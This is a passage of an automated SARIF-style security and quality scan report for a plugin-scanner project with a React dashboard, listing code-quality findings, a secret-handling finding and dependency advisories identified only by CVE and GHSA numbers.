model."}, "properties": {"repobilityId": 144999, "scanner": "repobility-threat-engine", "fingerprint": "3d45bd6033a91b07c5a3e25c7b0c5510bb92808fc4fbf15801ba3c415592299b", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|3d45bd6033a91b07c5a3e25c7b0c5510bb92808fc4fbf15801ba3c415592299b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/ecosystems/types.py"}, "region": {"startLine": 19}}}]}, {"ruleId": "MINED062", "level": "none", "message": {"text": "[MINED062] Python Dataclass No Fields: @dataclass over an empty class \u2014 unfinished model."}, "properties": {"repobilityId": 144998, "scanner": "repobility-threat-engine", "fingerprint": "43bb405e71e1049d610494d908f4ffc4557c028a7173ca9e49e83f0e15994f60", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "python-dataclass-no-fields", "owasp": null, "cwe_ids": [], "languages": ["python"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348046+00:00", "triaged_in_corpus": 10, "observations_count": 92448, "ai_coder_pattern_id": 144}, "scanner": "repobility-threat-engine", "correlation_key": "fp|43bb405e71e1049d610494d908f4ffc4557c028a7173ca9e49e83f0e15994f60"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/checks/mcp_security.py"}, "region": {"startLine": 13}}}]}, {"ruleId": "COMP001", "level": "none", "message": {"text": "[COMP001] High cognitive complexity (and 85 more): Same pattern found in 85 additional files. Review if needed."}, "properties": {"repobilityId": 144997, "scanner": "repobility-threat-engine", "fingerprint": "7c5e4da366adccc7ef81d6f37d14b62312a4acc17ad37f689910af322e928ef0", "category": "quality", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 85 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"scanner": "repobility-threat-engine", "function": "check_skill_frontmatter", "breakdown": {"if": 8, "for": 1, "except": 1, "continue": 3, "nested_bonus": 4}, "aggregated": true, "complexity": 17, "correlation_key": "fp|7c5e4da366adccc7ef81d6f37d14b62312a4acc17ad37f689910af322e928ef0", "aggregated_count": 85}}}, {"ruleId": "MINED056", "level": "none", "message": {"text": "[MINED056] React Key As Index: key={index} in map() \u2014 re-renders the wrong elements on re-order."}, "properties": {"repobilityId": 144992, "scanner": "repobility-threat-engine", "fingerprint": "f2097b26c50c6cd15e1f51d6b2e6d47f3bc20456971ab1dd86997cadc5ec9853", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "react-key-as-index", "owasp": null, "cwe_ids": ["CWE-682"], "languages": ["typescript", "tsx", "javascript", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348032+00:00", "triaged_in_corpus": 12, "observations_count": 299917, "ai_coder_pattern_id": 135}, "scanner": "repobility-threat-engine", "correlation_key": "fp|f2097b26c50c6cd15e1f51d6b2e6d47f3bc20456971ab1dd86997cadc5ec9853"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/sparkline.tsx"}, "region": {"startLine": 31}}}]}, {"ruleId": "SEC029", "level": "none", "message": {"text": "[SEC029] Server-Side Request Forgery (SSRF) \u2014 outbound HTTP from user input (and 11 more): Same pattern found in 11 additional files. Review if needed."}, "properties": {"repobilityId": 144991, "scanner": "repobility-threat-engine", "fingerprint": "6e6b1fa9aa37cd5353c53477b8935ccc1c8f42b61f420ebd0ceb44871ba243eb", "category": "ssrf", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 11 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 11 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC029", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|6e6b1fa9aa37cd5353c53477b8935ccc1c8f42b61f420ebd0ceb44871ba243eb"}}}, {"ruleId": "MINED045", "level": "none", "message": {"text": "[MINED045] Ts Non Null Assertion: x! asserts not null - bypasses null checks - TypeError if wrong."}, "properties": {"repobilityId": 144987, "scanner": "repobility-threat-engine", "fingerprint": "4ed4f25b0dc837430bccaed52d622146f4eabf299eacc8034b9050977a8bff8c", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "ts-non-null-assertion", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["typescript", "tsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348005+00:00", "triaged_in_corpus": 12, "observations_count": 1810954, "ai_coder_pattern_id": 105}, "scanner": "repobility-threat-engine", "correlation_key": "fp|4ed4f25b0dc837430bccaed52d622146f4eabf299eacc8034b9050977a8bff8c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/evidence/categories.tsx"}, "region": {"startLine": 242}}}]}, {"ruleId": "MINED044", "level": "none", "message": {"text": "[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed."}, "properties": {"repobilityId": 144986, "scanner": "repobility-threat-engine", "fingerprint": "f378073b94b08b670c7bcee19a6da9cbe61be25f06e0c3f51e1c2246ed5d8d56", "category": "quality", "severity": "info", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"mined": true, "mining": {"slug": "js-console-log-prod", "owasp": null, "cwe_ids": ["CWE-532"], "languages": ["javascript", "typescript", "tsx", "jsx"], "precision": 1.0, "promoted_at": "2026-05-18T14:01:32.348003+00:00", "triaged_in_corpus": 10, "observations_count": 1940833, "ai_coder_pattern_id": 102}, "scanner": "repobility-threat-engine", "correlation_key": "fp|f378073b94b08b670c7bcee19a6da9cbe61be25f06e0c3f51e1c2246ed5d8d56"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/error-boundary.tsx"}, "region": {"startLine": 25}}}]}, {"ruleId": "SEC045", "level": "none", "message": {"text": "[SEC045] eval()/exec() on stored or user-supplied data (and 1 more): Same pattern found in 1 additional files. Review if needed."}, "properties": {"repobilityId": 144983, "scanner": "repobility-threat-engine", "fingerprint": "c59edcd8286991ab7caac4493f8f01b268fef2a5d218265ad20f6e2d1172fefb", "category": "injection", "severity": "info", "confidence": 0.2, "triageState": "false_positive", "verdict": "likely_fp", "isResolved": true, "reason": "Deduplicated summary only: 1 additional occurrences found. The top occurrences remain visible as actionable findings.", "evidence": {"reason": "Deduplicated summary only: 1 additional occurrences found. The top occurrences remain visible as actionable findings.", "rule_id": "SEC045", "scanner": "repobility-threat-engine", "confidence": 0.2, "correlation_key": "fp|c59edcd8286991ab7caac4493f8f01b268fef2a5d218265ad20f6e2d1172fefb"}}}, {"ruleId": "DEPCUR-NPM", "level": "none", "message": {"text": "npm package `@types/react-dom` is patch version(s) behind (^19.2.2 -> 19.2.3)"}, "properties": {"repobilityId": 144975, "scanner": "repobility-dependency-currency", "fingerprint": "4d7288a6a1b9b9017a12b0a37c8865e0d366ba7d147648866bc7a721ebc35188", "category": "dependency", "severity": "info", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "patch version(s) behind", "signal": "currency", "cwe_ids": [], "package": "@types/react-dom", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "19.2.3", "correlation_key": "fp|4d7288a6a1b9b9017a12b0a37c8865e0d366ba7d147648866bc7a721ebc35188", "current_version": "^19.2.2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "DEPCUR-NPM", "level": "none", "message": {"text": "npm package `react-qr-code` is patch version(s) behind (^2.0.16 -> 2.0.21)"}, "properties": {"repobilityId": 144974, "scanner": "repobility-dependency-currency", "fingerprint": "0be75eba65cbc8a2900d22b09492166b0a8416ba2aa2fce041ded7c1101574bd", "category": "dependency", "severity": "info", "confidence": 0.9, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"gap": "patch version(s) behind", "signal": "currency", "cwe_ids": [], "package": "react-qr-code", "scanner": "repobility-dependency-currency", "ecosystem": "npm", "languages": ["javascript"], "latest_version": "2.0.21", "correlation_key": "fp|0be75eba65cbc8a2900d22b09492166b0a8416ba2aa2fce041ded7c1101574bd", "current_version": "^2.0.16"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/package.json"}, "region": {"startLine": 1}}}]}, {"ruleId": "JRN009", "level": "error", "message": {"text": "Secret-like setting is echoed into a password input value"}, "properties": {"repobilityId": 145130, "scanner": "repobility-journey-contract", "fingerprint": "5fab04f24d5b989b76699e9e25295e80c8ed202575b41796197e6c1e353447f3", "category": "auth", "severity": "high", "confidence": 0.83, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "A password or secret-named input is populated from a secret-like variable instead of a masked placeholder.", "evidence": {"rule_id": "JRN009", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|token|48|jrn009"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/approval-proof-modal.tsx"}, "region": {"startLine": 48}}}]}, {"ruleId": "PYSEC-2026-161", "level": "error", "message": {"text": "starlette: PYSEC-2026-161"}, "properties": {"repobilityId": 145126, "scanner": "osv-scanner", "fingerprint": "993c965e051ac08384f28c004ed2828303fa08d6e623c80da1211dbce5cea7ce", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["CVE-2026-48710", "GHSA-86qp-5c8j-p5mr", "X41-2026-002"], "package": "starlette", "rule_id": "PYSEC-2026-161", "scanner": "osv-scanner", "correlation_key": "vuln|starlette|CVE-2026-48710|uv.lock", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-86qp-5c8j-p5mr", "PYSEC-2026-161"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["20d0e73bab623b5772bb5ee81b54e26f25bfd7b3f632ca3aec483536eb176c89", "993c965e051ac08384f28c004ed2828303fa08d6e623c80da1211dbce5cea7ce"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-179", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-179"}, "properties": {"repobilityId": 145125, "scanner": "osv-scanner", "fingerprint": "3a8c92a4bc42452ab63c8b780593c12b550761e77665f811c437dd35791069ae", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48526", "GHSA-xgmm-8j9v-c9wx"], "package": "pyjwt", "rule_id": "PYSEC-2026-179", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48526|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-178", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-178"}, "properties": {"repobilityId": 145124, "scanner": "osv-scanner", "fingerprint": "529afc49608a001ef35ca72e2e5bf2ab615fb9fdf39e2d3fc621ae3c7274698b", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48525", "GHSA-w7vc-732c-9m39"], "package": "pyjwt", "rule_id": "PYSEC-2026-178", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48525|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-177", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-177"}, "properties": {"repobilityId": 145123, "scanner": "osv-scanner", "fingerprint": "e4a57bf8d7416024fd079256b08e268bcee4f11f05b7eaee044fc1d8b95a1189", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48524", "GHSA-fhv5-28vv-h8m8"], "package": "pyjwt", "rule_id": "PYSEC-2026-177", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48524|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "PYSEC-2026-175", "level": "error", "message": {"text": "pyjwt: PYSEC-2026-175"}, "properties": {"repobilityId": 145122, "scanner": "osv-scanner", "fingerprint": "5008712fe3bda523fafb9d2d087e037a86c42cd2bee1401e12b9c2d636db62f1", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-48522", "GHSA-993g-76c3-p5m4"], "package": "pyjwt", "rule_id": "PYSEC-2026-175", "scanner": "osv-scanner", "correlation_key": "vuln|pyjwt|CVE-2026-48522|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-5039", "level": "error", "message": {"text": "stdlib: GO-2026-5039"}, "properties": {"repobilityId": 145118, "scanner": "osv-scanner", "fingerprint": "227084fa5c6747ed982a63670a5dec95ba82dbebfede35fcb76d6473fccbafb2", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42507", "CVE-2026-42507"], "package": "stdlib", "rule_id": "GO-2026-5039", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42507|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5039"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["227084fa5c6747ed982a63670a5dec95ba82dbebfede35fcb76d6473fccbafb2", "902a1d02fa9651d7c2f19198abd9cca1ff69914f56f9c6439e9db80f36027361"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-5038", "level": "error", "message": {"text": "stdlib: GO-2026-5038"}, "properties": {"repobilityId": 145117, "scanner": "osv-scanner", "fingerprint": "d2de60fbfc3b1b812e412dbd39a31abb5dbfc786aee1200ea761d2006844b927", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42504", "CVE-2026-42504"], "package": "stdlib", "rule_id": "GO-2026-5038", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42504|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5038"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5a3581119ddfa9f20b1d145ff8eeb86320bf647b4351a2877b9cfe96187b139d", "d2de60fbfc3b1b812e412dbd39a31abb5dbfc786aee1200ea761d2006844b927"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-5037", "level": "error", "message": {"text": "stdlib: GO-2026-5037"}, "properties": {"repobilityId": 145116, "scanner": "osv-scanner", "fingerprint": "81c390edefbc310e700bdd4c3e6e72c683c1bf09d9ac0efdfade08e857fc80c9", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-27145", "CVE-2026-27145"], "package": "stdlib", "rule_id": "GO-2026-5037", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-27145|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-5037"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2b1998403a58a3dff4d401caebf5463e4ce04f4456cb130b24e7ad59af6df21a", "81c390edefbc310e700bdd4c3e6e72c683c1bf09d9ac0efdfade08e857fc80c9"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4986", "level": "error", "message": {"text": "stdlib: GO-2026-4986"}, "properties": {"repobilityId": 145115, "scanner": "osv-scanner", "fingerprint": "0be0b3f5355711c2edbb66c49bdab490d1b94a7a379fa8c2e126854c1481e924", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39820", "CVE-2026-39820"], "package": "stdlib", "rule_id": "GO-2026-4986", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39820|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4986"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["0be0b3f5355711c2edbb66c49bdab490d1b94a7a379fa8c2e126854c1481e924", "21b22e37d5d78b374e7e1ac0fde23248b7941832834a4eaea242fe1f9e0ba394"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4982", "level": "error", "message": {"text": "stdlib: GO-2026-4982"}, "properties": {"repobilityId": 145114, "scanner": "osv-scanner", "fingerprint": "91116bdf39dbc16f8c8d365c6a2683bf5cebcfda0aed458beffcbe92e61e16c7", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39823", "CVE-2026-39823"], "package": "stdlib", "rule_id": "GO-2026-4982", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39823|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4982"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["91116bdf39dbc16f8c8d365c6a2683bf5cebcfda0aed458beffcbe92e61e16c7", "9a199fb48f2f015f9b0d5bc05b60359a69fe633946991e2aa5aa785698c3c210"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4981", "level": "error", "message": {"text": "stdlib: GO-2026-4981"}, "properties": {"repobilityId": 145113, "scanner": "osv-scanner", "fingerprint": "f78e05b9fe8faa30196efc6c5678912e2cf2ebc609487b0d8a58ea83456165ef", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-33811", "CVE-2026-33811"], "package": "stdlib", "rule_id": "GO-2026-4981", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-33811|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4981"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["08cdedc9120a69a8dd2a4b4789c6cadd6131a3fa104655d4d8113775f31b4d53", "f78e05b9fe8faa30196efc6c5678912e2cf2ebc609487b0d8a58ea83456165ef"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4980", "level": "error", "message": {"text": "stdlib: GO-2026-4980"}, "properties": {"repobilityId": 145112, "scanner": "osv-scanner", "fingerprint": "f930f3ac890d1add8dcfba19b4b163276cbecb0d819895a7db65796ae8e30ee5", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39826", "CVE-2026-39826"], "package": "stdlib", "rule_id": "GO-2026-4980", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39826|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4980"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["5fc30490aa9269aee5f288c82906688671ec4f5c22adf8eeb91a81cfa3bec643", "f930f3ac890d1add8dcfba19b4b163276cbecb0d819895a7db65796ae8e30ee5"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4977", "level": "error", "message": {"text": "stdlib: GO-2026-4977"}, "properties": {"repobilityId": 145111, "scanner": "osv-scanner", "fingerprint": "76edc7f8f086517d32d7792fcb2f7c4c8f40fcb95da8053544e42a56beb342c8", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-42499", "CVE-2026-42499"], "package": "stdlib", "rule_id": "GO-2026-4977", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-42499|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4977"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["76edc7f8f086517d32d7792fcb2f7c4c8f40fcb95da8053544e42a56beb342c8", "b378ee709d4c0541e733d2acc42aafd62556e514dd7d544bd3287efdcdcbe85d"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4976", "level": "error", "message": {"text": "stdlib: GO-2026-4976"}, "properties": {"repobilityId": 145110, "scanner": "osv-scanner", "fingerprint": "844d61c00b17767d8694c711317458e20f3b50804cac99df6c979cf950dc1b03", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39825", "CVE-2026-39825"], "package": "stdlib", "rule_id": "GO-2026-4976", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39825|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4976"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["844d61c00b17767d8694c711317458e20f3b50804cac99df6c979cf950dc1b03", "b2d18e73090f464184fd257ed2f67d64dcb8baedc76545aea54cc4e9d2fe5107"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4971", "level": "error", "message": {"text": "stdlib: GO-2026-4971"}, "properties": {"repobilityId": 145109, "scanner": "osv-scanner", "fingerprint": "8c9ef4f388e10fec7500e05fc16bf3b0d8432e2c200a7660d59bdcd51b8e6281", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-39836", "CVE-2026-39836"], "package": "stdlib", "rule_id": "GO-2026-4971", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-39836|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4971"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["1f5979dc9b0c2128f0732af10155022201d041a58c8d94a2ca1918bd3bcc16ab", "8c9ef4f388e10fec7500e05fc16bf3b0d8432e2c200a7660d59bdcd51b8e6281"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4947", "level": "error", "message": {"text": "stdlib: GO-2026-4947"}, "properties": {"repobilityId": 145108, "scanner": "osv-scanner", "fingerprint": "d1281d0b65e08ca9ee1405460c8e7f753d0c4d2db13ca7b5ea87d1bdc08d8234", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32280", "CVE-2026-32280"], "package": "stdlib", "rule_id": "GO-2026-4947", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32280|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4947"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["c3a7296a652f0ba3c8cc95b5cc8380ab2cd7a1bdef66b8e07e4c3aa7f2084575", "d1281d0b65e08ca9ee1405460c8e7f753d0c4d2db13ca7b5ea87d1bdc08d8234"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4946", "level": "error", "message": {"text": "stdlib: GO-2026-4946"}, "properties": {"repobilityId": 145107, "scanner": "osv-scanner", "fingerprint": "a370c15cedce5e7c75c158afb16fe93d181a4bd05db7151559a896bac57221a3", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32281", "CVE-2026-32281"], "package": "stdlib", "rule_id": "GO-2026-4946", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32281|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4946"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["1f89a604627a3fb10ddb5748f92ab836aa430e642e036670dd3712adab990e7b", "a370c15cedce5e7c75c158afb16fe93d181a4bd05db7151559a896bac57221a3"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4918", "level": "error", "message": {"text": "stdlib: GO-2026-4918"}, "properties": {"repobilityId": 145106, "scanner": "osv-scanner", "fingerprint": "5fca1fe24cce8213376dbf2d89dd0f478a34e42e0b012781b6ff4e5b0276177b", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-33814", "CVE-2026-33814"], "package": "stdlib", "rule_id": "GO-2026-4918", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-33814|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4918"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["2c2cc514095d1c5d00206adb0b149b4bc300edc9f20dcd9ffdb6fbe7fd69bf5c", "5fca1fe24cce8213376dbf2d89dd0f478a34e42e0b012781b6ff4e5b0276177b"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4870", "level": "error", "message": {"text": "stdlib: GO-2026-4870"}, "properties": {"repobilityId": 145105, "scanner": "osv-scanner", "fingerprint": "617b93d5c48a029ae5aca8bd501f2e3bea7dac8bc21d793a090ee20081b769d3", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-golang-2026-32283", "CVE-2026-32283"], "package": "stdlib", "rule_id": "GO-2026-4870", "scanner": "osv-scanner", "correlation_key": "vuln|stdlib|CVE-2026-32283|token", "duplicate_count": 1, "duplicate_rule_ids": ["GO-2026-4870"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["617b93d5c48a029ae5aca8bd501f2e3bea7dac8bc21d793a090ee20081b769d3", "7027f8accaf5e53a6da839a1759425624746e07e8f94f1eefb69087765fb5e2a"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/go-safe/go.mod"}, "region": {"startLine": 1}}}]}, {"ruleId": "GO-2026-4869", "level": "error", "message": {"text": "stdlib: GO-2026-4869"}, "properties": {"repobilityId": 145104, "scanner": "osv-scanner", "fingerprint": "be08cdf9ec4ecd894e42dad7b5e0850688a77062b75cde9cea1314f8f97a87f7", "category": "dependency", "severity": "high", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 